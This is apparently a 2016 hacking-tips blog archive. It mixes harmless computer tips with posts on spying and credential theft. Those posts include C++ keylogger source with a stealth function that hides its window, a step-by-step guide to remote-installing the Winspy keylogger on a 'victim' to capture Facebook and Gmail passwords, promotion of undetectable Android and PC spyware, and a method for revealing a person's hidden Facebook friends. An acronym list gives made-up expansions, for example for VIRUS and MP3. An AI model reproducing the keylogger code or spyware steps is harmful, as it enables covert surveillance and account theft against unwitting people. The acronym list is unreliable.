Posts

Showing posts from April, 2016

Download Our App "KeyHunters" apk file

download our app Just for android users its really epic It is newly available on our new site https://keyhunters.ml just visit and download our app and be udated to our posts

How do I create my own computer program?

Image
How do I create my own computer program? Note:  Creating a computer program requires knowledge of one or more programming languages, as well as other considerations. This page does not provide step by step instructions for creating a program, as the steps differ depending on the type of program being created and the programming language. Anyone interested in developing software, such as a program, game, or online service, must start by learning a  programming language . There are many different programming languages and creating a new software program requires more training and more time than one page can provide. Therefore, this page is meant as a general overview to help point you in the direction to get started. An important beginning step is to have a plan for what program you want to develop. For instance, a plan would include the purpose of the program, game, or service, and the features you want to include. Be thinking of what your plan is as you continue reading. ...

MOST COMMON TERMS USED IN CYBER/TECHNOLOGY AND THEIR MEANING:

MOST COMMON TERMS USED IN CYBER/TECHNOLOGY AND THEIR MEANING: .1. HTTP- Hyper Text Transfer Protocol 2. HTTPS -Hyper Text Transfer Protocol Secure 3. IP -Internet Protocol 4. URL -Uniform Resource Locator 5. USB -Universal Serial Bus 6. VIRUS -Vital Information Resource Under Seized 7. 3G -3rd Generation 8. GSM -Global System for Mobile Communication 9. CDMA -Code Division Multiple Access 10. UMTS -Universal Mobile Telecommunication System 11. SIM -Subscriber Identity Module 12. AVI -Audio Video Interleave 13. RTS -Real Time Streaming 14. SIS -Symbian OS Installer File 15. AMR -Adaptive Multirate Codec 16. JAD -Java Application Descriptor 17. 3GPP -3rd Generation Partnership Project 18. 3GP -3rd Generation Project 19. MP3 -MPEG Player 3 20. MP4 -MPEG Player 4 (video file) 21. AAC -Advanced Audio Coding 22. GIF -Graphic Interchangeable Format 23. JPEG -Joint Photographic Expert Group 24. BMP -Bitmap 25. MMORPG -Massive Multiplayer Online Role Playing Game 26. WLAN -Wireless Local...

How To Create Apple I'D Without Credit Card 2015

How To Create Apple I'D Without Credit Card 2015 Hi Guys Today i am going to tell you How To Make Apple I'D without credit card 2015-16 The method is very simple and easy and you will create your Apple I'd by this. And this method is implemented on iPhone but you can also do this for all other iOS device like iPod etc. So just follow up the below steps to proceed. Create Apple I'D Without Credit Card 2015 Steps To Create Apple I'D Without Credit Card First of all make sure that you have not logged in your account and if you are then log out from your device. Now open your app store and tap any of the free apps available there, you can choose and of the app from there. Now hen you click on the free button there, that button will get converted into install and when you click on it your downloading process will initiates and then there will be two option there one is sign in and other “Create New Apple I'd“, just tap on it to create a new iOS I'd. Now se...

How To See Someone’s Hidden Friends On Facebook?

How To See Someone’s Hidden Friends On Facebook? In this method you will use google chrome browser to reveal the secret friends of any of your friend. A chrome extension will work for you for resolving this issue. You just have to follow some of the simple steps discussed below. Steps To See Someone’s Hidden Friends On Facebook :- 1-First of all download and install latest version of Google Chrome Browser in your computer. 2-Now install the extension Facebook Friends Mapper.\ 3-Now this extension will get added to your google chrome browser. 4-Now login into your facebook account and open the profile of friends whose hidden friends you want to see. 5-Now click on friends option there in your friends profile. 6-Now you will see a reveal friends section there which will only appear when you had added the above extension. Just click on it. 7-Now it will start scanning the friends and will display all the hidden friends of that person. For more updates like and share our page

How To Encrypt Keyboard To Avoid Keyloggers

How To Encrypt Keyboard To Avoid Keyloggers With encrypting keystrokes of keyboard the value that a keylogger will be different from the actual value that the user had entered and everytime keylogger will be sending wrong data to hackers and that will not harm your at all. So have a look on simple steps below to implement this in your windows PC. Steps To Encrypt Keystrokes To Avoid Keylogger Attacks :- 1-First of all download and install the tool KeyScrambler. 2-Now after do wnloading install it and after complete install you have to reboot your system do it. 3-Now when your computer boot up right click on the icon of KeyScrambler in the system tray at bottom of screen. 4-Now choose options from there and Keyscrambler will open and you will see screen like below. 5-Now you can alter settings in this according to your wish and after that simply click on ok 6-Thats it you are done, now you can see this tool everytime you open your browser and also your keystrokes are encrypted an...

How To Became A Great hacker

How To Became A Great hacker 1. Learn TCP/IP, Basic Information gathering, Proxies, Socks, SSL, VPN, VPS, RDP, FTP, POP3, SMTP, Telnet, SSH. 2. Learn Linux, Unix, Windows - You can do this using vmware or any virtual desktop utility. 3. Learn a programming language that's compatible with all OS - Perl, Python, C, ASM 4. Learn HTML, PHP, Javascript, ASP, XML, SQL, XSS, SQLI, RFI, LFI 5. Learn Reverse engineering and crack some programs for serials easy ones like mirc, winzip, winrar or old games. 6. Code a fuzzer for common protocols - ftp, pop3, 80, 8080 - Pick some free software like ftp server, mail server, apache or iis webserver or a webserver all-in-one pack, or teamspeak, ventrilo, mumble. 7. Code a tool that uses grep to sort out unique code in source codes. 8. Make a custom IPtable, IPsec firewall that blocks all incoming traffic and out going traffic and add filters to accept certain ports that your software or scripts use. 9. Pick a kernel in linux or unix, also pi...

How to get a free Domain

Image
How to get a free Domain  its really simple to get a free domain i've found a new way for you just type a URL freenom.com sign in as Google+ search a domain rigister it it will be absolutely free freee free like i got

How To Make Your Computer Welcome You at Windows Startup?

How To Make Your Computer Welcome You at Windows Startup? There is a very simple code that you have to paste in notepad and make your computer speak whatever you write in it. And your computer will speak same so just follow some of simple steps discussed below. 1-First of all click on start and then type Notepad and then press enter. 2-Now in notepad paste the below code :- Dim speaks, speech speaks=”Welcome to your PC, Username” Set speech=CreateObject(“sapi.spvoice”) speech .Speak speaks 3-In the place of user name you can put your own name and anything you want computer to speak. 4-Now save this as Welcome.vbs in your desktop. 5-Now copy the file and paste in the C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) and to C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista) if C: is your System drive. 6-Thats it you are done, now every time you start your computer a welcome v...

How To Lock/Unlock PC Using Bluetooth Of Smartphone

How To Lock/Unlock PC Using Bluetooth Of Smartphone The method is very cool and depends on a third party software that will set bluetooth security pairing with your PC and mobile and your computer will be secure. So have a look on some simple steps below to proceed. Steps To Secure Your Computer By Lock/Unlock Using Bluetooth of Smartphone: 1-First of all Download and Install BtProximity program in your windows PC. 2-Now install the app and the you will see a icon will get cr eated on the system tray. 3-Now right click on the BtProximity icon on system tray and select Configure. 4-Now a configure screen will get displayed like shown below. 5-Now pair your device with your computer by right clicking on bluetooth icon tray and then selecting Add a bluetooth device. 6-Now in the Configure dialog box click on Install button after setting all the fields according to your wish, Like tick on Lock when device go out of range etc. 7-Thats it you are done now your computer is protected with y...

Spatio-Temporal Dynamics

Spatio-Temporal Dynamics "Spatio-Temporal Dynamics"::-New way to steal passwords Hackers can speculate PINs by interpreting video of people tapping on their smartphone screens even when the display itself is not visible, according to the presentation shown by the researchers at Syracuse University. Software used to interpret such video relies on “spatio-temporal dynamics” to measure the distance from the fingers to the phone’s screen, and then guess exact which characters the fingers tap on a keypad. This research was published by the Association for Computing Machinery last year. The technology is very easy simple for anybody who knows programming, and millions of targets are available due to the flaring use of smartphones. With a combination of image analysis and motion tracking algorithms, software filled in the gaps, which were remarkably effective at “guessing” the PINs users typed in. The software figured out the correct password between 40% and 62% of the time o...
Usefull information about you 1.) You use more than 10% of your brain (in fact you use all of your brain). Most of your brain is active all of the time, even when you’re asleep. 2.) Actually, your brain is MORE active when you're asleep. 3.) Information can go in between parts of your brain at a speed of 260mph. 4.) You have over 100,000 miles of axons in your brain. They could wrap around the Earth 4 times. 5.) Your brain doesn’t have pain receptors. It can’t feel anything. 6.) Its lack of pain receptors is why doctors can perform brain surgery on conscious patients. 7.) Kim Ung-Yong of South Korea had the highest IQ ever recorded (210). 8.) Your brain is the fattest organ in your body. It's about 60% fat. 9.) Ancient peoples thought the brain wasn’t important as the stomach and heart. When mummifying people, Egyptians would pull the brain out through the nose. 10.) Brain tissue has a consistency that's very similar to tofu. 11.) Your brain can generate about 25 wat...

HOW TO CREATE KEYLOGGER USING C++.?

HOW TO CREATE KEYLOGGER USING C++.? Any Idea about keylogger..? Keylogger is a software program that is used to monitor and log each of the keys a user types into a computer keyboard.In this way keylogger steals user information such as passwords and sends it to the Hacker. There are many Key loggers in the market , but never mind, we are programmers and we develop our version of the tool. copy the below code, compile and run it. Once you run the program you can see the “log”  file created along with the executable ones CODE : ‪#‎ include‬  <iostream> #include <fstream> using namespace std; #include <windows.h> #include <winuser.h> int Save (int key_stroke, char *file); void Stealth(); int main() { Stealth(); char i; while (1) { for(i = 8; i <= 190; i++) { if (GetAsyncKeyState(i) == -32767) Save (i,"LOG.txt"); } } system ("PAUSE"); return 0; } int Save (int key_stroke, char *file) { if ( (key_stroke == 1) || (key_stroke == 2) ) ...

Fb hacked by Keylogger.....

Fb hacked by Keylogger..... How to hack facebook, twitter, Gmail password using Winspy Keylogger Keylogger is also one of the best ways to hack password of facebook, gmail or any other website account. In this post i am going to show how to hack passwords using winspy keylogger. Read the steps givn below: 1. First of all get your Winspy keylogger. Download it from the link given below Download Here : http://www.mediafire.com/?x614qhmh15mrj 2. After downloading, run the program and create the user id and pasword. Remember this password as it is required each time you start Winspy and even while uninstalling. 3. Then a new dialog box will open to show you the hotkey (Ctrl + Shift + F12 ) to start keylogger. 4. Now press the hot key written in last step to go to the login form and enter login details to login. 5. Now you are on main screen of the software. CLink on remote at top and then remote install. > user – type in the victim’s name > file name – Name t...

android hacking application An keylogger type monitoring application .

Android Keylogger Hello friends Today I am going to show you android hacking application An keylogger type monitoring application . Let Me tell about what is a keylogger? A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a small program that monitors each keystroke a user types on a specific keyboard. Keyloggers are used to Record System events: Power offs, SD cards removal, USB connections, WiFi connections. Now what is Android Keylogger(Kid looger.apk Apps)? What is Kidlooger? KidLogger free application used to track phone coordinates by GPS or Wifi records and uploads incoming/outgoing calls and photos taken by the target phone. its Undetectable. It is not visible for any antivirus.you can uploaded to your online account. you can keep a watch your Android with KidLogger. Benefits Of Using Android Kidlooger? Kidlooger is a safe and invisible spy tool by which you can know every activity of a target android mobile phone. With the help of kidloo...

keylogging hacking concepts - most easy way to hack any pc ..

keylogging hacking concepts - most easy way to hack any pc .. basically keylogger are the special hacking software .when you install them in any computer then they are totally undetecteble at all . means if in your pc somebody installed the keylogger then you never find out any how .. after the keylogger successfully installed in any pc .there is two part .one operator and second is victim .once keylogger installed in victim pc the operator can access all activity of the vict ims computer anywhere ..some famous keylogger are . 1,spyagent- this is award wining keylogger you can track all typing activity of any victim.you track all run programme and also find all saved file in victim pc . at spyagent website all introduction is given ..how to use it in simple way 2,refog keylogger this advanced keylogger is so famous in these day .by using this you also can get anytime screenshot of any victim pc and one time you can handel lots of victims pc.and it is totally undetecteble from an...

Steps to ‪#‎Speed‬ Up Your ‪#‎Computer‬’s ‪#‎Performance‬

Steps to ‪#‎Speed‬ Up Your ‪#‎Computer‬’s ‪#‎Performance‬ Steps to  ‪#‎ Speed‬  Up Your  ‪#‎ Computer‬ ’s  ‪#‎ Performance‬ 1. Make Sure Your Hardware is Sufficient Above and beyond everything you can do with software to optimize the function of your computer, making sure you have the proper hardware to support Windows is critical. 2. Clean Your Desktop Is your Windows Desktop dotted with files? Have you noticed that your computer has been running slower and slower? Do you see the hard drive light often flashing while you wait for the computer to respond to an action? There are steps you can take to fix it. Read this article. 3. Scan Your Windows System for Errors An operating system is a collection of files that perform different functions. It is possible, over time, that one or more of these system files has changed or become corrupted. If this happens, the speed of your system may decrease. By using a utility called “System File Checking”, it will inspect t...

Stop checking your phone before Sleeping #Health Tip

Stop checking your phone before Sleeping** The act of looking at your cell phone screens right before you sleep is such a bad idea and it is one that is more devastating than many people think. A clinical professor of Psychiatry at the UCLA School of Medicine, Dr Dan Siegel explains all the negative effects that looking at your cell phone screen before sleeping can have on our brain and body. The impact of screens on sleep is devastating. You know people are exposing their eyes to the stream of photons from this object that basically tells your brain to stay awake, It’s not time for sleep yet. Its 10 pm, 11 pm, 12 pm and you are checking for email, checking for text , chatting and doing all the rest on your phone. **ShareIt

General ‪#‎Keyboard_Shortcuts‬, General Keyboard Shortcuts

General  ‪#‎ Keyboard_Shortcuts‬ , General Keyboard Shortcuts General Keyboard Shortcuts CTRL+C (Copy) CTRL+X (Cut) CTRL+V (Paste) CTRL+Z (Undo) DELETE (Delete) SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin) CTRL while dragging an item (Copy the selected item) CTRL+SHIFT while dragging an item (Create a shortcut to the selected item) F2 key (Rename the selected item) CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word) CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word) CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph) CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph) CTRL+SHIFT with any of the arrow keys (Highlight a block of text) SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document) CTRL+A (Select all) F3 key (Search for a file or a folder)...